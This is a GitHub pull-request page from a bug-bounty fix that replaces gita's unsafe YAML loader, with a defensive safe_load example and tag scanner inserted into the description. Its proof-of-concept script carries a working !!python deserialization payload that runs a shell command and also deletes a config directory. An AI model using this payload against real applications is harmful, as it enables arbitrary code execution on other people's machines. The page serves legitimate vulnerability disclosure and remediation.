This repository has been archived by the owner on Dec 19, 2023. It is now read-only.

Arbitrary Code Execution Fixed #1

Merged
merged 2 commits into from
Jan 30, 2021

Conversation

Anon-Artist

@Anon-Artist Anon-Artist commented Jan 30, 2021

📊 Metadata *

gita helps to manage multiple git repos with sanity.

Bounty URL: https://www.huntr.dev/bounties/1-pip-gita

⚙️ Description *

Vulnerable to YAML deserialization attack caused by unsafe loading.

💻 Technical Description *

Fixed by avoiding unsafe loader.

🐛 Proof of Concept (PoC) *

Create the following PoC file:
exploit.py

# exploit.py
import os
os.system('pip3 install gita')
from gita.utils import get_cmds_from_files
payload = """cmd: !!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('calc.exe')"
"""
# os.system("cd ...") only changes directory in a child shell, so change
# the interpreter's own working directory instead.
os.chdir(os.path.expanduser("~/.config"))
os.system('rm -r gita')
os.system("mkdir gita")
os.chdir("gita")
open('cmds.yml', 'w+').write(payload)
get_cmds_from_files()
print("calc has been popped -> Arbitrary Code Execution")

Execute the commands in another terminal:

python exploit.py

xcalc will pop up.

🔥 Proof of Fix (PoF) *

After the fix, it will not pop up a calc.

👍 User Acceptance Testing (UAT)

After the fix, functionality is unaffected.

🔗 Relates to...

https://www.huntr.dev/bounties/1-pip-gita
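The fix described above replaces the unsafe YAML loader. The following is an added example, not code from the gita project or from this PR, showing how a gita-style cmds.yml is parsed with PyYAML's yaml.safe_load (which refuses every `!` tag, including all `!!python/...` tags, with a ConstructorError) alongside a dependency-free scanner that lists any tags present in the text, useful for logging or a CI gate before the file is ever loaded. The file layout assumed here (command name mapping to cmd and help) and the sample documents are constructed for the example; the tagged sample uses inert tags rather than the PoC payload.

```python
# Added example (not code from the gita project or from this PR): loading a
# gita-style cmds.yml with yaml.safe_load, plus a dependency-free pre-check
# that reports any YAML tags in the text. The file layout (command name ->
# {cmd, help}) is an assumption about gita's format, not taken from the PR.
import re
from typing import Any, Dict, List, Optional

# Constructed sample: what a benign cmds.yml entry is assumed to look like.
BENIGN_CMDS = """\
comp:
  cmd: git commit -m
  help: commit with a message
"""

# Constructed sample: the same layout carrying YAML tags. A loader that
# honours Python-specific tags would build Python objects from this; the
# tags chosen here are inert, but safe_load rejects any such tag outright.
TAGGED_CMDS = """\
comp:
  cmd: !!python/tuple ["git", "commit"]
  help: !shell "echo hi"
"""

# A tag is '!' or '!!' followed by a tag name, preceded by start of line,
# whitespace or a flow-collection delimiter. This is a heuristic triage
# check for audit logging or CI gating, not a replacement for safe_load.
_TAG_RE = re.compile(r"(?:^|[\s\[{,])(!{1,2}[A-Za-z0-9_/:.\-]+)", re.MULTILINE)


def find_yaml_tags(text: str) -> List[str]:
    """Return every YAML tag token found in ``text``, in order of appearance."""
    return _TAG_RE.findall(text)


def load_cmds(text: str) -> Optional[Dict[str, Any]]:
    """Parse cmds.yml content with the safe loader.

    Returns the mapping on success, or None when PyYAML refuses the document
    (any '!' tag, including all '!!python/...' tags, raises ConstructorError
    in the safe loader) or when the top level is not a mapping. The unsafe
    call shape, yaml.load(text, Loader=yaml.Loader), must never be used on
    user-writable files such as a config directory.
    """
    import yaml  # PyYAML; imported here so the tag scanner has no dependency

    try:
        data = yaml.safe_load(text)
    except yaml.YAMLError:  # ConstructorError, ScannerError, ... all derive from this
        return None
    # safe_load returns None for an empty document; normalise to a dict so
    # callers never iterate over None.
    if data is None:
        return {}
    if not isinstance(data, dict):
        return None
    return data


def audit_cmds_file(text: str) -> Dict[str, Any]:
    """Combine both checks into one verdict a loader or CI job can act on."""
    tags = find_yaml_tags(text)
    loaded = load_cmds(text)
    return {"tags": tags, "loaded": loaded, "accepted": loaded is not None and not tags}


if __name__ == "__main__":
    for name, text in (("benign", BENIGN_CMDS), ("tagged", TAGGED_CMDS)):
        verdict = audit_cmds_file(text)
        print(name, "accepted" if verdict["accepted"] else "rejected", verdict["tags"])
```

The scanner and the loader are deliberately independent: the scanner runs with no third-party dependency and gives a human-readable reason (the offending tag) for a rejection, while safe_load remains the actual security boundary, since the scanner's regex can miss tags in unusual layouts and is only a triage aid.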

huntr-helper pushed a commit to 418sec/huntr that referenced this pull request Jan 30, 2021
@huntr-helper
Member

👋 Hello, @nosarthur - @Anon-Artist has opened a PR to us with a fix for a potential vulnerability in your repository. To view the vulnerability, please refer to the bounty URL in the first comment, above.

Ultimately, you get to decide if the fix is 👍 or 👎. If you are happy with the fix, please write a new comment (@huntr-helper - LGTM) and we will open a PR to your repository with the fix. All remaining PRs for this vulnerability will be automatically closed.

If you have any questions or need support, come and join us on our community Discord!

@nosarthur & @Anon-Artist - thank you for your efforts in securing the world’s open source code! 🎉

@nosarthur

lgtm, thanks for bringing it up! please go ahead with the PR

@Anon-Artist
Author

Thanks @nosarthur, can you please type it like this:
@huntr-helper - LGTM
as a comment, because the huntr bot needs to detect this.

@nosarthur

@huntr-helper - LGTM

@huntr-helper huntr-helper merged commit 331c0bf into 418sec:master Jan 30, 2021
@JamieSlome

@Anon-Artist - it looks like this didn't fire off as the bounty URL was invalid at point of LGTM.

Have added some background logic to validate this for next time, cheers! 🍰

@JamieSlome

@nosarthur - the PR has been opened upstream!

Thanks! 🍰
